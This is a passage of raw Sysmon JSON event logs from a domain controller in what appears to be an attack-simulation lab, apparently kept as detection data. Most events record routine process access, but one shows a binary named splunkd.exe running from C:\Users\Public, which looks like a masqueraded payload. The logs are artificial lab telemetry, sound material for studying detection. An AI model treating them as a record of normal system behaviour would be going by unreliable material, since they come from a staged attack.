07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8881,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:00.373\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:00.373","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8882,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:00.373\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:00.373","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8883,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:00.373\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A4-5F25-0000-00100BBB1000}\r\nTargetProcessId: 212\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:00.373","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-13A4-5F25-0000-00100BBB1000}","TargetProcessId":"212","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8884,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:00.513\r\nSourceProcessGUID: {E2A3D6B1-13A4-5F25-0000-00100BBB1000}\r\nSourceProcessId: 212\r\nSourceThreadId: 4936\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:00.513","SourceProcessGUID":"{E2A3D6B1-13A4-5F25-0000-00100BBB1000}","SourceProcessId":"212","SourceThreadId":"4936","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8885,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:00.670\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:00.670","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8886,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:00.701\r\nProcessGuid: {E2A3D6B1-13A3-5F25-0000-001091B11000}\r\nProcessId: 4400\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1130-0\\System.WorkflowServices.dll\r\nCreationUtcTime: 2020-08-01 07:03:00.701","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:00.701","ProcessGuid":"{E2A3D6B1-13A3-5F25-0000-001091B11000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1130-0\\System.WorkflowServices.dll","CreationUtcTime":"2020-08-01 07:03:00.701","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8887,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:00.748\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-137C-5F25-0000-001078840F00}\r\nTargetProcessId: 2716\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:00.748","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-137C-5F25-0000-001078840F00}","TargetProcessId":"2716","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8888,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:00.748\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-137C-5F25-0000-001078840F00}\r\nTargetProcessId: 2716\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:00.748","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-137C-5F25-0000-001078840F00}","TargetProcessId":"2716","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8889,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:00.763\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A4-5F25-0000-00101DBE1000}\r\nTargetProcessId: 2716\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 